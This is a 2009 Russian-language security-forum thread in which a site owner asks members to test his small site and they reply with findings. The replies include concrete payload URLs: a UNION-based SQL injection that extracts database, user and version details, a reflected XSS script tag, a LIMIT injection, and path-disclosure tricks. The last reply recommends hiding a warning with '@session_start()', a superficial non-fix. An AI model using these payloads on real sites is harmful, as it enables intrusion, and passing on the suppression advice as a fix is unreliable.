HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Маленький проект проверьте
  #1  
Старый 13.11.2009, 05:09
Wakko
Познающий
Регистрация: 01.06.2009
Сообщений: 38
С нами: 8917832

Репутация: 2
По умолчанию Маленький проект проверьте

Проверьте пожалуйста http://wakko.ru/
Гостевую, регистрацию и востановление пароля.
Спасибо.
 
Ответить с цитированием

  #2  
Старый 13.11.2009, 15:53
[NiGHT]DarkAngel
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
С нами: 11114426

Репутация: 129
По умолчанию

Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1

Не особо страшно, но все же не фильтруется

Раскрытие путей при подмене сессии:
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /путь/index.php on line 3
Подмена заголовков,поле User-Agent

Последний раз редактировалось [NiGHT]DarkAngel; 13.11.2009 в 17:02..
 
Ответить с цитированием

  #3  
Старый 13.11.2009, 21:51
Wakko
Познающий
Регистрация: 01.06.2009
Сообщений: 38
С нами: 8917832

Репутация: 2
По умолчанию

Цитата:
Ошибка обработки оператора LIMIT в MySQL
http://wakko.ru/index.php?cstart=-2&do=book&act=1
Исправил. Спасибо.

Цитата:
Раскрытие путей при подмене сессии:
А как избавлиться т этого можно?
 
Ответить с цитированием

  #4  
Старый 07.12.2009, 03:28
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию

XSS
http://wakko.ru/?do=members&orderby=1<script>alert(12345)</script>
 
Ответить с цитированием

  #5  
Старый 07.12.2009, 05:29
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

SQL inj
Цитата:
http://wakko.ru/index.php?do=profile&name=administratorrrr'+union+ select+1,concat_ws(0x3a,database(),user(),version( )),3,4,5,6,7,8,9,10,11,12--+
раскрытие путей
Цитата:
http://wakko.ru/index.php?do=profile&name[]=administrator
 
Ответить с цитированием

  #6  
Старый 07.12.2009, 07:32
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию

Цитата:
Сообщение от Wakko  
А как избавлиться т этого можно?
Поставить собачку перед сессион_старт в 3й строке.
PHP код:
@session_start(); 
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Visal Studio. как востановить проект?!! панике!! оlbaneс С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 0 22.06.2009 20:25
Анеки=) porter Болталка 25 25.11.2006 21:10



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.